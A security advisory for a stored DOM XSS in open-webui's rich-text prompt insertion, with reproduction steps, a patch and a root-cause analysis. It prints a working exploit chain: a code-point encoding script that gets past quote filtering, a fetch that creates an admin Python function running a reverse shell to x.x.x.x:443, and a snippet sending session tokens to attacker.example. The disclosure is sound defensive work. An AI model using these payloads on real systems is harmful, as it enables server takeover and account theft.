Run the command /poc via a chat window.
<img width="2470" height="1332" alt="image" src="https://github.com/user-attachments/assets/5a112f51-210a-43f3-b999-915b1d0e6744" />
Observe the alert is triggered. <img width="2452" height="1456" alt="image" src="https://github.com/user-attachments/assets/fa15dbd6-44a7-4cfc-bd93-4cc56aac5eea" />
Since admins can legitimately run arbitrary Python code on the server via the 'Functions' feature, this XSS could be used to force any admin who triggers it to create such a function containing Python code of the attacker's choosing.
This can be accomplished by making the admin's browser issue the following fetch request:
fetch("https://<HOST>/api/v1/functions/create", {
method: "POST",
credentials: "include",
headers: {
"Content-Type": "application/json",
"Accept": "application/json"
},
body: JSON.stringify({
id: "pentest_cmd_test",
name: "pentest cmd test",
meta: { description: "pentest cmd test" },
content: "import os;os.system('echo RCE')"
})
})
This cannot be done directly, because the `marked.parse` call that the HTML is passed through neutralises payloads containing quote characters:
<img width="1718" height="482" alt="image" src="https://github.com/user-attachments/assets/6797efbd-4f2e-4570-ad9f-59a65dba1745" />
To get around this, strings must be constructed manually from their decimal code points using `String.fromCodePoint`. The following Python script automates generating a viable payload from a given piece of JavaScript:
payload2 = """
fetch("https://<HOST>/api/v1/functions/create", {
method: "POST",
credentials: "include",
headers: {
"Content-Type": "application/json",
"Accept": "application/json"
},
body: JSON.stringify({
id: "pentest_cmd_test",
name: "pentest cmd test",
meta: { description: "pentest cmd test" },
content: "import os;os.system('bash -c \\\\'/bin/bash -i >& /dev/tcp/x.x.x.x/443 0>&1\\\\'')"
})
})
""".lstrip().rstrip()
out = ""
for c in payload2:
out += f"String.fromCodePoint({ord(c)})+"
print(f"<img src=x onerror=eval({out[:-1]})>")
An admin who triggers the corresponding payload via a prompt command will unknowingly create a Python function that runs a reverse shell, giving the attacker command-line access to the server. <img width="2476" height="756" alt="image" src="https://github.com/user-attachments/assets/01f9e991-832a-4cfb-8c3e-3b2ce02cff15" />
Any user running the malicious prompt could have their account compromised via malicious JavaScript that reads their session token from localStorage and exfiltrates it to an attacker-controlled server.
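A minimal sketch of such an exfiltration payload is shown below; the localStorage key name and the collector URL are illustrative assumptions, not values confirmed in this report:

```js
// Illustrative only: read the victim's session token from localStorage
// (key name assumed) and send it to an attacker-controlled collector.
const token = localStorage.getItem('token');
fetch('https://attacker.example/collect?t=' + encodeURIComponent(token));
```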
Admin users running the malicious prompt risk exposing the backend server to remote code execution (RCE), since JavaScript executing via the vulnerability can send requests as the admin user to create and run malicious Python functions, which may execute operating system commands.
Low-privilege users cannot create prompts by default; the `USER_PERMISSIONS_WORKSPACE_PROMPTS_ACCESS` permission is required, which may be granted via e.g. a custom group. See: https://docs.openwebui.com/features/workspace/prompts/#access-control-and-permissions
A victim user running the command to trigger the prompt must have the 'Insert Prompt as Rich Text' setting enabled in their preferences for the vulnerability to trigger. The setting is off by default; users with it disabled are unaffected.
Sanitise the user-controlled HTML with DOMPurify before assigning it to `.innerHTML`.
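A minimal sketch of this remediation, assuming the HTML comes from `marked` and is written to an element (the variable names and the `#editor` selector are illustrative, not the exact patch code):

```js
import DOMPurify from 'dompurify';
import { marked } from 'marked';

// promptContent stands in for the user-controlled prompt text.
const promptContent = '<img src=x onerror=alert(1)>';

// Convert to HTML as before, but sanitize the result before it reaches the
// innerHTML sink so script and event-handler payloads are stripped.
const unsafeHtml = marked.parse(promptContent);
document.querySelector('#editor').innerHTML = DOMPurify.sanitize(unsafeHtml);
```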
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| open-webui | npm | <= 0.6.34 | 0.6.35 |
| open-webui | pip | <= 0.6.34 | 0.6.35 |
The vulnerability exists in the open-webui frontend application, specifically within a Svelte component responsible for handling rich text input. Analysis of the security advisory and the associated patch commit `eb9c4c0e358c274aea35f21c2856c0a20051e5f1` confirms the root cause. The function `replaceCommandWithText` in `src/lib/components/common/RichTextInput.svelte` takes text from a user-created prompt, converts it to HTML using the `marked` library, and then prepares it for DOM insertion. The vulnerability is a classic DOM XSS, where untrusted content is passed to an `innerHTML` sink without proper sanitization. The `marked` library explicitly states it does not sanitize HTML, which is the core of the issue. An attacker with permissions to create prompts can store a malicious JavaScript payload. When a victim user, with the 'Insert Prompt as Rich Text' feature enabled, uses that prompt, the `replaceCommandWithText` function is called, and the payload executes. The patch confirms this by introducing `DOMPurify.sanitize` to clean the HTML generated by `marked` before it can be rendered, thus neutralizing the XSS threat.
Vulnerable code: `replaceCommandWithText` in `src/lib/components/common/RichTextInput.svelte`
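For context, the vulnerable flow described above reduces to roughly the following shape (a simplified sketch, not the exact component code; `promptContent` and the `#editor` selector are placeholders):

```js
import { marked } from 'marked';

// Simplified sketch of the pre-0.6.35 flow: marked performs no sanitization,
// so the payload survives the markdown-to-HTML conversion...
const promptContent = '<img src=x onerror=alert(document.domain)>';
const html = marked.parse(promptContent);

// ...and executes once it is assigned to the innerHTML sink.
document.querySelector('#editor').innerHTML = html;
```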